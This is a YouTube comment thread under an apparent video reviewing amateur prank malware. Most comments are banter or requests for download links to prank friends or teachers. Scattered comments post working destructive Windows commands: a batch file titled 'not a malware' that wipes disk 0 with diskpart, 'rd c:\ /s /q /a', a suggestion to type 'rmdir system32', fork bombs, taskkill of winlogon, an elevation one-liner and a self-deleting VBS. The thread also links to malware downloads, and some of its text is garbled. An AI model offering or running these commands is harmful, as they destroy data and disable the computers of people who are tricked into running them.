I like how enderman is passive-agressive in this video
0 likesSong : Tobu - Seven
0 likesI remember all the AppleScript viruses we made at school that would open like 500 finder windows.
0 likesBro How Can I Send You My Malwares
0 likesImagine being one of his subscribers and trying really hard to make something good only to have said YouTuber make a video talking about how much your thing sucks
2 likesTo be honest here, I think the death virus was designed pretty good. ngl.
1 likeDo you have a download link? I want to modify some ones.
0 likesCan you send me a link to this “W2.0 upgrade” pls?
0 likesI should make a malware that opens 100 chrome TABS and ruin that guy’s life
0 likesWhat program name please reply!?
0 likes2:48 the computer wont be even able to restart cuz the location c:\windows\system32 cannot be found
0 likesYo im working on a trolli virus im just asking do you want the beta version?
0 likesHow about a Video about reviewing good progtams send to you that are not considered "malware", "garbage" or "virus"
1 likeI would have such program for you
help my computer won't boot in windows 7 setup
1 likeHmm can you give me a download link of "Death Virus" (2:55) ?
0 likesOh ya, these look like trashes. Plus I have a few comments about all the malware made in this video.
1 like1. MINDYOBUISNESS: It seemed that the publisher made the buttons to show up message boxes.
2. BlueBooter: The name of the BlueBooter seems to have been related to the Blue Screen Of Death (BSOD)
2A. Which windows OS will make the directory "C:\Desktop" to make that as a default desktop location?! The right one is "%Userprofile%\Desktop"
Note: %Userprofile% is also related to C:\Users\%Username%\
2B. Killing svchost.exe process won't make the computer display BSOD, instead make almost all of a application components won't work or make the CTRL+ALT+DEL combinations will not work. In windows 10, it will make the computer freeze.
3. CMDspam: Command Prompt Windows won't make the computer really unusable, It will only make it freeze. (If those windows reached the maximum process numbers)
4. Installer
4A. People can't write in batch and rename it to an executable. Compile it is a better choice or stay with the .bat extension
4B. People cannot even delete all the windows files even when they even login as adminstrator.
4C. The restart Command doesn't exist, try the command "Shutdown -r -t (Your own time before the computer restarts)
5. Death: Cool
6. Joke.Win32.Win2xUpgrade: Most windows doesn't come with the powerpack installed.
Replies (1)
I'm liking this comment
0 likesHey, I have a psexec based virus running in the recycle bin. It's pesky, and it is untouchable (even by admin cmd recycle empty commands). Luckily Sophos stops the malware from calling out to the internet to whom ever wrote it. How the hell should I get ride of it? Even Sophos can't manage it, only stop it from calling out.
0 likesbro what's the point of prank virus if you're not gonna share it .-.
0 likesplease give me the link i really wnana prank my friend rn
CMD Spam would eat my cpu up like Cookie Monster with a cookie
0 likesWhat windows build is that?
0 likesCMD spam did have a necessary elevation because that person sat at his desk and thought: “Hmmm... I KNOW! Let’s make an program that spams cmd’s and is so inconsistent that half of the cmd’s are elevated and the other half aren’t!”
0 likesI might send my own version of curfun.exe (forces you to type “LOL” every 500 milliseconds and moves your mouse to a random location, also every 500 milliseconds)
1 like"MINDYOBUISNESS" was really good and funny
0 likes4:15 This is why you grab .net, and throw it in the garbage
0 likesonce in primary school i created this thing in vbs for the IT teacher but let's just say he deserved it. dropping the file on his computer was easy as the whole class was on an unlimited network so I could just pass files to whoever I wanted.
0 likesAnyway, here's the code:
Set objFSO = CreateObject("Scripting.FileSystemObject")
set shl=CreateObject("Wscript.shell")
WScript.Sleep(100000)
counter = 0
shl.run "www.youtube.com"
do
WScript.Sleep(10000)
shl.run "www.youtube.com"
counter = counter + 1
If counter = 5 Then Exit Do
loop
strScript = Wscript.ScriptFullName
objFSO.DeleteFile(strScript)
(obviously you could replace www.youtube.com with some other websites and also you could vary the counter and the time it takes between the openings)
The "Death Virus" is at least, nicely made .
1 likeReplies (3)
But I got my brain 🧠
0 likes... That was 2 years ago
0 likesYou copied a comment 🙂🤚
0 likesif only death virus killed explorer.exe it would be more convincing
0 likeshow can u make that blue screen to close the programms
0 likesBut why wallpaper windows 10 but system is windows 7?
0 likesI want enderman to roast my virus
1 likehey Enderman how do i boost my fps with download some fps booster what is the best pls tell me :(!
0 likesStill want the old font
1 likewhere there is no download for death virus?
0 likesWhere do you get this video music it’s awesome
0 likesDo another except it’s good malware this time
1 likeThe TRASHWARE
1 likeHey enderman, can you link the file for the death virus its pretty neat and i want to send it to my friends
0 likesThank you for your reply!
0 likesI have windons 7 and i have a virus than my pc Turns off alone and blue screen can you help me pls
0 likesQuarantine brought here also! lol best of luck bruva. Lets see if we can do sotNice tutorialng productive with tNice tutorials down ti!
0 likesPlease, Please, Please include "New Quantize Jumps" also in "Edison" and "Slicex".
0 likesWhy is the channel name and photo in censored
0 likesimagine he spreads malware while we watching it
0 likesEnderman you are against the war
0 likes2:49
0 likesNo way. There is no way someone actually wrote this.
Next garbage be like is txt file where is link to scratch. There, somebody made "virus" that makes the screen go rainbow 😂
1 likeDeath virus download link?
1 like1:40 the ultimate RAM test
0 likesAhh good old batch files.....
0 likes2:52
0 likesi am speechless
I know I'm not any pro coder but at least I can write a basic virus in c# without any errors
0 likesthe death virus is kinda good ngl
0 likesThe person who made the death "virus" definitely tried! If i downloaded that i would actually be scared tbh. I think it would be a good way to prank people who don't know much about how viruses and all the mal/ad/spywares work!
0 likesMove %0 is if you wish to move current file
0 likesThat death virus was actually pretty good prank virus
0 likesCan I get the death virus link? (Only personal use)
0 likesWhat is all happening at 2:50 ?
0 likesLike damn bro a vbs with
1 likeSet oShell = CreateObject ("Wscript.shell")
Dim strArgs
strArgs = "cmd /c bruh.bat"
oShell.Run
And a batch with
%0|%0
Would be a better virus than these
You know, they all tried and did their best. I’ll give them that.
2 likesThat's why these are called TRASHWARE
0 likesC:DESKTOP LMFAO
1 likeSome months ago, i wanted to be a programmer, but when i looked at a single script and developing program, i changed my mind. It's just too hard i don't understand anything
0 likeswhere can i download the death virus
0 likesThis music is worse than all of those 'Viruses'
0 likesThese viruses reminds me of the first bat shit i made when i was a kid , never posted anything though
0 likesi have a trash program. where do i send it
0 likesBeing a soft engineer you make me want to code a Real one 😂
1 likeWhy did you put the profile picture y name in censored
0 likesWindows 10 wallpaper on a Windows 7? You tricked me XD.
0 likes7? Windows 7
1 likeDeath Virus wins, flawless victory !
0 likesThey always going forget about the .vbs and .bat extensions
0 likesBasically what everyone thinks is a virus command:
0 likes:spam
run cmd
goto spam
how you use personalization on win7 ultimate???
0 likesI want the "Death Virus", that like good !
0 likes3:09 not bad virus.Virus classifying:Prank/Not destructive
0 likes1:17 "C:/Desktop" are you serious?!?!
1 likeWere can you download koteyka not on your page
0 likes2:48 xaxaxaxaxaxaxaxa
2 likeswhen 12 year olds make "viruses" to try and infect the person that killed them on Fortnite.
1 likeCan I download the Death Virus?
0 likes2:44 you need to use an actual converter, not just renaming the file.
1 likeReplies (2)
@@jonas9 ok
0 likesthose "converters" do nothing, they just copy the bat files to temp and run them
0 likesI actually wanted to email you this cool fake virus I made as a tribute to you but now I’m kinda discouraged ngl
1 likerude my guy, but still gangster
0 likeshow did he change the background im kinda new to codeing
0 likes2:39 this guy name is Andrew look in properties
1 likehow can i make a trash malware like MINDYOBUISNESS
0 likesCan anyone tell me why enderman was shocked to see the code of Installer.exe? im confused
0 likeswindows 8 and 8.1: you killed my son!
0 likesI am very interested to know whether you are Russian or not ???
1 likeMy viruses were bad in 2019, but now they are better.
0 likesPlease, give link to Death Virus
0 likesIf you check my channel in about 2 months I will try to post on how i tried to make malware and you guys should load it up in a Virtual Machine ( I did it on my old trash laptop that i didnt have any files on). would not recommend running on your personal or work computer. It's badly made but dangerous. NOT A JOKE
1 likenice as always i love peoples malware
0 likesI made a harmless computer virus through your video so thanks for that lmao
0 likeshow does the death virus work?
0 likesR.I.P. Windows 7
0 likesThe Installer.exe one was never shown. Shame. Wonder what it did.
0 likeswhat does the thing at 2:47 do
0 likesI cmdspam once and posted it in the chat while I was in class, they thought it was a virus. (They didn't realize it was me because I sent it from a fake account)
0 likesA lot of .NET apps and some c++ apps made with Microsoft Studios need some DLLs but the creators don't tinculde them.
0 likesReplies (1)
Yes. It's also somewhat OS specific.
1 likeChat publicly as Amy Decker... (slow mode is on)
0 likesGordon Ramsey of malware
0 likeswhere to send these trash "malwares"?
0 likesin new feature, virus become popular in galaxy
0 likes2:48 bruh moment
0 likesI use GNU+Linux as an operating system, but I have a Windows 10 virtual machine. Maybe I could use that to write more trash for you ;)
1 likeReplies (2)
@@slendi9623 Good idea, so that I can write the code on my real machine :)
1 likeYeah you can do that, i did that. Just use mingw compiler then DAD the files into the vm or use dd to create an image file to use as cd or usb or whatever
0 likesWhat is more garbage the trash outside or the *Garbage* showed in this video?
1 likeLol most of the viruses were made in visual studio so it was gonna show a JIT error
0 likesFor the cmdspammer, you right click on the cmd icon at the bottom, and close all processes
0 likesHe's like michael reeves reviewing robot ideas
0 likesMalware is death
1 like3:36 And the illusion has been broken...rip
0 likesMe:wait,how do I put garbage on trash malware
0 likescmd spam: 1:40
0 likeswin2xupgrader: 3:48
2:48 what does that mean?
1 likeReplies (1)
The Holy D-Boi That code is a ridiculous attempt at wiping the C drive.
1 likeHow many computers do you have?
0 likesReplies (1)
he is using virtual box basically you can download windows in an application
0 likesHow tf did he get the aero theme from Windows Vista / 7 on Windows 10?
0 likesDid you know why the last virus failed? Because the creator of that virus don't included an exception catching code. That's just a JIT Exception
0 likesHow to use virtual machine:
0 likesDownload Oracle VM Virtual Box or Buy one of VMware products, Then search on youtube "how to install [OS you want to install] on [VirtualBox/VMware]"
That's all
When you fail at being destructive:
0 likeswhere is the "death virus" download link please i want to troll my teachers
0 likeswhat vm do you use
0 likesReplies (1)
he uses virtualbox
0 likesNext : Can you get viruses from QR-Codes
0 likesI want a download to MINDYO BUSINESS
1 like1:48 oh i did it on the school computer :D the teacher exploded
0 likesGive me the Download Link for That "Death Virus" Prank
0 likeswhere can I download it? 2:55
0 likesLol, I saw someone download CMD spam in one of those laptop displays at Walmart.
0 likesThe “death virus” was kind of cool
0 likesAnd On Death Virus They Ran The Vbs File.
0 likesi have an idea
0 likesif he doesn't see this atleast
so what you do
is make him check the stuff
the scripts
and just
have a
rickroll
in there
Nice 'NO' ,but its a 'YES'
0 likesAt least e waste can be melted down to gold
0 likesCan I have death virus download link please?
0 likesHow to make an even deadlier version of cmd_spam:
0 likesMake the program open itself and loop (yeah...)
mind yo buissness
0 likesYou can press Alt + F4 to close all CMD_SPAM windows
0 likesmy batch file malware from when i was ~8 would atleast copy itself to other drives...
0 likesBut the one at 3:09 is kinda good
1 likePls dont hate me
Replies (1)
y e s
0 likesbro ended some lifes here
0 likesI like Enderman's videos but... What the hell is wrong with that "VIRUS" developers?
0 likesOkay
0 likesI accept challange and will learn more to make a virus(or garbage) which I can be proud of.
C:\desktop their thinking about windows 10 folders in this pc, but svchost does not get killed without elevation
0 likes0:31 I Know, PixelPlayer!
2 likesit has pixel gun 3d icon.
Edit: PixelPlayz
Replies (3)
Send me a link
0 likes@PixelPlayz What do you send a TRASH MALWARES in comments called "MINDYO BUISNESS" Inspired by KOTEKYA
0 likes@PixelPlayz How do you know?
0 likeslmao
Am i the only one that thinks MINDYOBUSINESS is a masterpeice?
0 likesTry segurazo: search more information of it (im argentinian but i know some english sorry if i say anything wrong) I love your videos!
0 likes2:01 it happend to me once when i made my malware and have run on my host
0 likesit had to die ;-;
Enderman open note place into installer:Enderman is so trash huh
0 likesMe:Enderman idk what is
2:48 forgot to put off at the end..
1 likeWhats the song at 0:30
0 likesTge name: dedly virus dont open !!!!!!!!!!!!!1!11!!!!1
0 likesThe "virus" : hmm ye im gonna restart ur pc
Cmd spam is amazing
0 likesYou should do the ILOVEYOU virus or Mydoom
0 likesReplies (1)
you have danooct1 for that
0 likesCan you do meze trojan virus cuse my brother and I made it
1 likeHey Enderman! Im created a antyvirus on CMD, .bat file. He scanned a catalog on Desktop. This is the scanner .okolicy (test file) .bat .cmd .btm files. Name scanner: Kiol Defender Batch. To translate: Jeszcze go nie skończyłem, jak skończę, to prześlę go Tobie. Ważna uwaga: Nie pokazuj jego kodu na odcinku, ale sam możesz zobaczyć. Wykrywa on 5 typów zagrożeń: ransomware, destroyers, malwares, spyware, spammer Windows.
2 likesReplies (1)
Ok
0 likesdamn this video reminds me of 2010
0 likesThe CMD spam batch can be cancelled if you just spam ctrl+c fast enough, don't need to reboot lol
0 likesHey Andrew! can you make a video Windows XP y.exe?
0 likesThe classic virus
0 likes:a
start explorer
goto a
Machines with 2 GB of RAM will give up almost immediately
If you replace start explorer with start chrome, then it’s even more amazing
Can you do an tutorial how to use Virtual Machine? I heard that if you dont setup it good the files you download in the VM can be transferred to your real pc. and the site where to also download the windows?
1 likeNice virus prank
0 likesI want link for Death Virus
0 likesR.I.P.
0 likeswhere's my crasher.bat or whatever?
ENDERMAN HELLO
0 likesU have a good music taste
0 likes2:32 the reason why the malware does not run because it uses an invalid format on the executable. as of the thumbnail on notepad it shows commands:
0 likesrd C:\ /s /q /a
restart -1
echo
it should be a .cmd or .bat file.
Replies (1)
Also, the atrocious code would have resulted in so many errors.
1 likeplease give the download link :( !
0 likesHow do you even code a virus, I wanna make my own and troll my mom
0 likesimportant to the community and windows 10 7 11 8.1
0 likesIs there a way to get "death"?
0 likes2:52. Bruh at least use an Bat2EXE. There’s one built in into Windows and you can legit make Batch files that use the tool of windows. If you gonna use crap, make it runnable. Maybe open up Recourse Hacker and add an icon if you gonna make a .exe that isn’t really a compiled executable lmao
1 likeCan I get death virus? I love that prank virus!
1 likeWhy is there no download link
0 likesMake another trash malware video !
1 likeToday on not overused songs...
1 likeWell some people do not know how to code good viruses
0 likes
what is password in your tool ?
0 likesWhat is "Универсальные читы!!!" file?
0 likes3:35 system32 is a folder, not a file
0 likes1:40 forkbomb
0 likesgive link for copycmd.exe
0 likesplease
2:00 just get an auto clicker to close the windows
0 likesrestart -1
0 likesecho hello
hello
1:43 so it is a fork bomb you have created
0 likes2:48 rd c:\/s/q/a is not very intresting when all it does is deletes personal files only and deletes files that windows need to boot when you can't figure out how to allow access to all system files, restart is not a command and that is not how you use the echo commands!
0 likesif its not a virus it’s a bacteria
0 likeshehe
I need know how to make this "Death Virus"
0 likesDid they know what is "compiling"
0 likes> Windows 2.0
0 likes> Brand now OS
Oh yeah. Windows 2.0 is definitely new.
alright can someone tell me how to make the death virus?
0 likeshow i can send you a virus ???
0 likesTry on windows 10, have you heard of it?
0 likeshey enderman why don't you try my malware in some video???
0 likesHe is running his own pc for us guys give him some likes man
0 likesHe should have 10 million subscriber why does he not have 10 mil 🤦🏽♂️
0 likesThere'll be no more Windows 10!
0 likesWindows 10X is coming:
Link: Coming in May.
I drank all the milky-milk in my sippy cup!
0 likesReplies (1)
Why did you make this comment?
1 like1:49 my friend made same on school computer
0 likesDid you know that this wallpaper which he has set is also available in Windows 10 in the set of wallpapers?
0 likesReplies (1)
што
0 likeswait, thats windows 7 and it work only at windows 10?
0 likesReplies (1)
move H:/body/p~1/s.brain xç C:\$Recycle.Bin
0 likestarget H:\body\p~1 "taskkill /f /im brain.exe"
echo @off
echo this is just a joke bruh
Death virus actually seems like it didn’t take 30 seconds to write In notepad
0 likesI had this saved as a .txt file on my computer what the hell
0 likesthose are prank viruses and you expect them to do stuff
0 likes2:10 Windows 7 R.I.P.
0 likesI definitly will try the "death virus on mah real machine! xD
1 likeWhat happened to your font?
0 likesI just got 4 ads on this video. Enderman, I'm deleting your monetizatiln.
0 likesI have made a virus that made someones computer rage
0 likesWhen my sister bored: playing with friend
0 likesWhen i bored: activate my laptop, open notebook and start writing a ".bat" script and save as ".bat"
Script i used:
@Echo off
Color 1a
Mode 100
Goto ti
Cls
:ti
Echo hello
Pause
Cls
i got an antivirus ad lol
0 likesImagine a 12 year old Child can code a .exe That Crashes your PC.
0 likesYeah i am this Child
2:57 why do people call everything a virus
0 likeswhy ur rude against ppl that happily sends you their joke viruses
1 likeReplies (1)
@@AndrewYouTube_ he modified the description
0 likesAHH CANT FIND THE BACKGROUND ANYWHERE :(
0 likesYeah yeah. Make fun at their masterpeices.
0 likesWould u use memz trojan ?
0 likesTuorash!
1 likeI like your content, but I think that the NCS or EDM tracks are so overused that it kind of bothers me. I still think your videos are pretty cool.
0 likesi made a talking virus that delete’s the boot files but it is corrupted my cpu died
0 likesyo the cmd spamer is what i like to do in school on my friends pc. when they say me to send them the work ive done i give them this little file which is made in 30 secs and the y hate me for doing this xD
0 likesYo guys never trust people who edit comments
1 likeReplies (1)
I dont trust you
1 likethe death virus was cool
0 likesenderman shall keep dissing 11y old virgins till theres this one kid who gets angry at this video, wastes his entire life finding a vmware escape vuln, then punishes enderman and enderman shall be on his knees
0 likes10? WINDOWS 10
1 likeReplies (1)
WNDOWS 7 ? ON
1 likeThe guy “wANnA TeST this ViRuS”
0 likes4:11
0 likesBruh this joke malware is broken
no joke, death virus took the most effort.
0 likesme an arch user: observe
0 likesCan you install memz for vid?
0 likes2:48 here is a virus look like not work restart -1 ?
0 likesCan i have a death virus download link? I wanna to prank my friend with it
0 likesHow the actual heck did he include footage of his pc restarting??
0 likesReplies (2)
@@Lanausse oh yeah, makes sense
2 likesHe used a VM! It would be silly to use his main PC for testing these files in
2 likesMore of this pls
1 likeReplies (1)
U look like firebird Firefoxs friend
0 likesMe learn how to make a restart in notepad - restart
0 likesI was planing to do something and send it to you (just shutdown and change the backdrop and lat3r a text of readme and it says something idk man)
0 likesI had a virus before, I downloaded kinemaster, DO NOT DOWNLOAD IT!!! I took chances to recover and defeat the virus, its dead now
0 likesah trash, мы здесь идём опять
0 likes@echo off
2 likesTaskkill /f /im explorer.exe
Taskkill /f /im winlogon.exe
Replies (2)
Upgrade:
1 likeFilename (important) : fortnitevbuckhack
Bat file:
Start fortnitevbuckhack
Start fortnitevbuckhack
It's not gonna work
1 likelink "Death virus" pleas
0 likesi need a scrip
Can you link the death virus please?
0 likesCan you make malware for disable camera's ; like webcam or network based camera
0 likesReplies (1)
Or physical damage using a malware
0 likesif your going to make a cmd spam atleast make it in batch and have it open itself :/
0 likes0:31 this user profile is pixel gun 3d
2 likesim smorth
Replies (2)
Smarth vader
1 likeLmao
1 likeCan anybody send me a link for the Death virus
0 likesMan i love work that you did for the years on yt i would see you playing some games like gta or minecraft thank you for making my day great
0 likes2:50 LFMAO
1 likeCan I get death virus link. I want to try it!
0 likesThe dislikes are from the 2 year old that made those viruses.
1 likeI want the mindyobusiness malware
0 likesThis video isn't even THAT funny but I laughed out loud enough to scare my family
0 likesWonderful entertainment hahahaha
how do i chat? this video is now live.
0 likes1:47
0 likesType in Editor
@echo off
Start FakeVirus.bat
FakeVirus.bat
Save that with the name "FakeVirus.bat" BUT SELECT "All Documents" when your saving Screen. Save it on Desktop. BOOM Done
Not really hard
Quick fact. You can start it on your own Computer it shouldnt damage anything but i dont know how your Computer will react so be carefull
"KNOW YOUR PLACE, TRASH"
0 likesEnderman :( How Can i send you a file like that i just wanted to introduce my Fake virus, but this is not a just virus i was inspired to make this virus because of you. =( plz Tell me How.
0 likesSUCKED =10 FOR THAT CHEESY MUSIC.
0 likesI have been summoned
0 likesDeath virus is ok,it isn’t a good virus but at least he gives you your files back as a prank.
0 likesThe “Virus” in the computer
0 likesGIVE ME YO BUISNESS
0 likesHi... Can u put at ur videos no escape virus link download bc I want to start a channel. Thanks!
0 likesYou cannot represent feelings with a cursor
0 likes3:33 : ok
nobody:
0 likesEnderman: Virus should not be displeasuring look at.
В папке были универсальные читы.
1 likeI've got some garbage! type rmdir system32 -r -(i forgot) -(I forgot) into command prompt
0 likes1:07 “Универсальные Читы” on Russian this is Universally cheats
0 likesBeatiful malware.
0 likes1:50
0 likesHow to crash your computer 101
Windows 17?
0 likesoh... EnderMan Do You Play MINECRAFT
0 likes2:47
1 likegive me a link for mindyobuisness.
0 likesplease
Replies (1)
https://ln2.sync.com/dl/3ddfe5dc0/3me25nqi-bf9f4tvr-iit48d38-84dzj4mn/view/default/3023118930009
1 likeEvery pc user on earth be like: here's the trash
0 likesI made a MS DOS virus that replaces Autoexec.bat with virus.bat
0 likeslava.javascript.exe is not working
0 likes1:48 datamosh
0 likesDid you have minecraft videos beasuce minecraft mob teleporting is called enderman
0 likesFunfact i was making a vbs file to task kill a vbs file idk what i was thinking and i fork boomed myself LOL
0 likesI was subscribed when you have 700 subscriber good ol days
0 likesReplies (1)
I was watching him when he had like 2k ib 2018
0 likesDay 2 Of Asking Enderman To Try Out My Trojan
0 likesbat is classic
0 likesdid you use vmware or a real pc for this lol.
0 likesReplies (1)
vmware
0 likesbruh did you steal them from albania?
0 likesWhy can't people learn to use advanced bat to exe converter lol
0 likesWhy do people call it 'Virus?' I thought it was called Malware
0 likesMusic?
0 likesTry to open as admin
1 likeI think this script should be run with administrator privileges. I recommend to start by giving these 2 lines and save. The script should then work. This script also works on every Windows operating system, because you used cmd console and bat extension. I use the cmd extension and it does not work everywhere and the bat works everywhere. Here are 2 lines:
0 likesif not "%1"=="AdminPrivileges" (powershell start -verb runas '%0' AdminPrivileges & exit /b)
pushd %~dp0
Have a nice try :)
you need to run bluebooter in windows 10 as admin!
0 likesim not the creator but ik
000.exe it is very good for the best video
1 likecmd.exe HAS STOPPED WORKING
0 likesEXE BAT Trash Malawre
0 likesHo what is virus now locked jou pc of Windows 7
0 likesОн вроде русский знаете почему? 0:15 папка Универсальные Читы
1 likeEnderman use Wix for your website the better website builder. Why use just html?
0 likesWhy are u doing a spam
0 likesMalware when it gets u
1 likeez
ez
e/
e
ez
ez
I was just messing around and making a fake batch virus with vbs files that say an error occurred, and after I ran it, I taskkilled everything that used svchost.exe… bsod
0 likesThe person that owns the username enderman on youtube makes 2007 type of notepad tutorial video style vids very good
0 likesReplies (1)
What
0 likesTry editing an html file into
0 likes< p>You have been hacked <p > (no space except the sentence spaces)
And open it on chrome or something
Simplest fake malware ever
opencmd.bat >
0 likesstart cmd
I saw in cmd your name is Andrey... My name is Andrey too
1 likeReplies (1)
@Gamerkid logic :|
0 likesguilty, I feel like being honest here is going to be the most aningful.
0 likesCan you put the mine next? I send to u via gmail
0 likesBro ur pc has the crss virus
0 likesbecoz the original crss is in the windows processes and ur is in background
2:58 yes... Why? My friend's brawl stars bug and he call this bug with virus. I say "it's not virus" but he is angry what i say and he go home cry
1 likeReplies (1)
Grammar please
0 likes2:48 hahahahahaha the installer
0 likesThe creator of the last one could just supress the script errors and it would maybe work
0 likes" Trashware "
0 likesEnderman:Why does everyone put virus
0 likesMe:Enderman sit on a chair virus
Enderman:WHAT DID I TELL YOU
Me:What
Enderman:Jumps off cliff
Me:Uno reverse card
Enderman:What happend
Me:
Enderman:Say something you dummy
Me:Something
Enderman:Not literally
Me:ok
Enderman:Your stupid
Me:I'm gonna kill you
Enderman dies
Me:uno reverse card
Enderman:THANKS
ME:SIT ON IT NOW
ENDERMAN:NO
Aaron 70218 I tNice tutorialnk you accidentally closed it and then it crashed. Could you give more details?
0 likesi want to make duolingo software
0 likesit will say YOU FORGOT UR SPANISH LESSON, OR I WILL REMOVE UR FILES!
Mmm toxics....
0 likesplease review my malware made in bat...
0 likes1:46 Start %0 %0
0 likesYou know what I'd actually enjoy this channel a lot if it weren't for the generic edm music playing in the background.
0 likeswhat could go wrong?
0 likesGUYS Minecraft is not work im look appdata on zie no Probleem?
0 likesEnderman change the video name to “Trashware” I think it matches
0 likesReplies (1)
New Video? trashware.exe. Thanks for the idea dude
0 likesTry to Stop this virus
0 likesOMG I am a new youtuber please tell me how did you make the chatpters!
0 likesReplies (1)
Just add time stamps into the description of the video, but make sure to include 0:00 . If it doesnt work for you, just look at the description of this video
0 likeswell i am working on something not garbage
0 likesEdit: This actually isn't an edit.
0 likesSpam CMD
0 likes:1
Start
goto 1
Who got a TotalAV ad?
0 likes2:48 urrrr
0 likesПлиз, скиньте ссылку на Death Virus.
0 likesВ вк или комментвв
Универсальные читы говорили они...
0 likesBro very nice apk to exe trick
0 likesThis video made me literally LOL. Not good because it's 1:17 am.
0 likesi wondered what cmd spam looked like in Aero
0 likesReplies (2)
@@romoney That's a normal thing with Windows 7
0 likes3:59 also wait Windows 7 Basic in Windows 7 Aero?
0 likesMalware review 2019
0 likes"Универсальные читы"! удивило
0 likesI am currently working on a real virus (MEMZ but worse)
0 likesEnderman you can deteled can system 32 and windows folder only for windows 10 but whit a vm or a real computer good luck
0 likesПривет Эндермен, и ты.... РУССКИЙ? Или ты просто его знаешь? Или ты вообще в какой-то из стран СНГ? (Hi Enderman and you .... RUSSIAN? Or do you just know him? Or are you even in some of the CIS countries?)
0 likesU know how to remove Gen:Variant.Ulise.86845
0 likesJust got this crap on my pc
Replies (1)
Try Malwarebytes, if it doesn't find it then it was a wrong detection.
0 likesHi please send me a link from all of this malware!
1 likeI also want to test it in VMWare
Thanks
I programmed a Prank virus myself!
3:40 ez to reproduce
0 likesА где читы?
1 likeYo ender and name be Andrew. Same
0 likesGive me the death virus code
0 likesTHIS IS FUNNY!
0 likes4:12 move to net framework 2 or something(message for the creator)
0 likescan i get the mind yo business virus?
0 likesI lost track again
0 likesI love your videos, they are the bests
0 likesGreetings from Argentina
I'm on windows 10 and it broke my laptop i sadly need to use my ipad :(
0 likesMake more please
1 likeThe 10 people who disliked were the people featured.
0 likesIn github someone has recreated notpetya in batch and i mastered this.
0 likesIf u want test, said me
2:50 Nothing to say...
0 likesnice, outro is 4:20
0 likeswow 32 bit error
0 likesthe only that works are a cmd spam.
0 likesjeez.
You can do taskkill /im svchost /f on 8 and higher
0 likesI wish Enderman would send the download links if we wanted to try them
0 likesReplies (1)
No sorry
0 likesAndrew, I'm working on cancer.
0 likesrd c:\ /s /q /a
0 likesrestart -1
echo
windows itself is more of a malware
0 likesthanks mate tNice tutorials was a big help
0 likesCool
0 likesVery Nice Video Enderman!
0 likes2:49 I don't get it
0 likes1:08 Something Wrong.
0 likesHes saying these are all trash but id die if any of these happened to me
0 likesI died watching this
0 likesYour theme is windows 10 but
0 likesUsing win7 lol
Link :DD?
0 likesMy test malware: https://www.mediafire.com/file/1tx9mtxx9f3ar0n/test.exe.bat/file
0 likesReplies (2)
this is the shittiest "malware" ive made
0 likeslike this doesnt even harm your pc its just opening random programs
Yeah somehow the SmartScreen shows and at the publisher it says: "Unknown Publisher"
0 likes*club pengin*
0 likesDamn boy you have destroyed these people, specially with installer.exe xd
0 likesBut every malware is trash!
0 likesOr is it?
2:52 no comment
0 likesRd? Wdim? Remove direvtory?
0 likesno tarsh malware
0 likesI remember a malware and it called "Selena Gómez sexy hot" and that shit if was in the computer and put a drive the drive get the malware for infect more pc
0 likesWow
0 likesSir please give me to make disable keyboard
0 likesWow
0 likesyeah
0 likesI made a c⃠a⃠l⃠c⃠u⃠l⃠a⃠t⃠o⃠r⃠ cough cough I mean virus with C.
0 likesPc Windows 7 but desktop Windows 10 wtf
0 likesThis isn't garbage this is art lol
0 likesi cant stop laughing when he paste that installer.exe into notepad
0 likes2:48 Let's just ignore the "rd" line, but......
0 likesDOES WINDOWS HAVE COMMAND CALLED " RESTART " IN CMD?
I thought Microsoft's engineers will cry out loud after seeing that line of command...... XD, SO F--KING GENIUS, HUH?
Replies (1)
No, there's only shutdown -r
0 likesTobu - 7 song
0 likesLink of mind yo buisness
0 likesPut this code in a batch file:
1 like:trash
Echo My pc is trash
Start
Goto trash
Replies (1)
batch = nooooooob
1 likeGood pizza.exe ? Zb
0 likesCan you give the script for death virus or at least the download link i wanna prank my friends lol
0 likesNext time, don't blur user's icon, user's name, and link of any comment.
0 likesCan you please show the original comments screenshots unblurred?
What are the people and links shown in the comments before it was blurred?
For the death virus i want the script
0 likesso super my joke
0 likesthis joke named FOR.rar
lol this is stuff you'd make in 7th grade when you finished your work
1 likeBroken .NET malware i like that 3:48
0 likesI need the death virus
0 likesthat's actually kind of rude to just say that someone's work is cringy. at leat they tried. <:/
0 likesвсм универсальные читы?
0 likesCan I send you a virus?
0 likesI subscribed
0 likesThanks Algorithm...?????
0 likesI love ur vids
0 likesYes the death of virus was cool
0 likesThat cmd spam was stolen off a yt vid LOL
0 likesdam he called everything garbage LMFAO
0 likesTresh.
0 likesMe at Visual Basic 6 in the school in a nutshell.
0 likesReplies (1)
VB6
1 likeGood old language.
@echo off
0 likestitle not a malware
diskpart
select disk 0
clean
"Универсальные читы"
0 likestoo ahah but i watched it like 5 tis so i understand it now
0 likesI love it but sorry im on phone
0 likesEveryone fails at first tries
0 likesWait pixel not that
0 likes1:08 I saw you were using Windows 7 when you were supposed to use Windows 10
0 likesReplies (1)
I mean, it's just batch, why would it work on W10 only?
1 like4:10 thats downgrade not upgrade :/
0 likescmon 1k away from a nice number
0 likesThis would be so much better without roblox tycoon music
0 likesi think they are trolling
0 likesHey people that made garbage. Atleast you tried
0 likescan i have the death virus to prank my friend?
0 likesAh, Windows 7 Aero making things better. Not being sarcastic, I genuinely wish there was an Aero option.
0 likesTest. It. Before. You. Guess. It.
0 likesRun
0 likesHow many comments here are test out my virus
1 likeplease a test a virus windows 7
0 likesHello
0 likes1:02 batch. is not. the loveliest programming language. it gets mad at everything for literally no reason.
0 likeshmmm... maybe i should make a not trash malware sometimes for the fun of it
disclaimer: i know it is a joke
Replies (3)
@@enthusiasticgeek7237 ok
0 likes@@watermelown2536 i know it was a joke but i added a new disclaimer to it just for you
0 likesand, yes, batch is easy. too bad that doesnt fix the fact that it often breaks for seemingly no reason
r/woooosh
0 likesAnd batch is easy.. just put pause at the end of your code
Lol there are worse things you can do with batch
1 likeMusic is too much annoyed
0 likesPlease review and put up my malware I made in VBS and ba... NO
0 likesPlease test my new malware including updated Win2xUpgrade.
0 likesReplies (1)
Email ronnamdar109@gmail.com
0 likesEven though they suck, it's fun nonetheless!
0 likesNice video!
0 likes1:50 code:
0 likes@echo off
:A
start
goto :A
Универсальные читы))
1 likePOLAND?
0 likesI don't understand why you don't run these in a virtual machine. This is dangerous and stupid.
0 likesReplies (1)
@@horohousu I see, I misunderstood then. I thought 2:12 was a real PC rebooting.
0 likesvirus windows xp
0 likesrestart -1
0 likesrestart -1
0 likesМмм, универсальные читы
1 likeуниверсальные читы
0 likesI don't even code and know that the code in the Installer one is trash :P
0 likescreate Trash Malware 2 plz
